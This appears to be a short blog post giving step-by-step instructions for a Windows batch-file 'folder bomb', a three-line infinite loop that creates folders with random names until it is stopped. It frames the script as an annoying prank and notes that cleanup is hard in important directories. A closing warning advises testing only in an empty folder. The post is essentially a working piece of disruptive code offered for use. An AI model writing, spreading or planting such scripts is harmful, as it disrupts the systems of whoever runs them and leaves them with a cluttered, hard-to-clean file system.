Here is a great and annoying batch file trick with only three lines of coding. When the batch file is opened the batch file enters an infinite loop creating new folders at a very fast rate. It can create more than 1000 folders in just 7 seconds! Cleaning the newly made folders will be real difficult if the batch file is opened in a directory with a lot of important files and folders.
Follow the steps to create the folder bomb.
Step 1: Open notepad and type the following code in.
:techieCode md %random% goto techieCode
Step 2: Save as Flood.bat. Remember to include .bat extension.
That's it! Your folder bomb is ready for action!
WARNING: If you want to test this batch file, open the batch file in a new and empty folder. Do not open the batch file on your desktop or other important directories.
Remember to like and share the post.
Subscribe to the blog to keep up to date!
0 comments: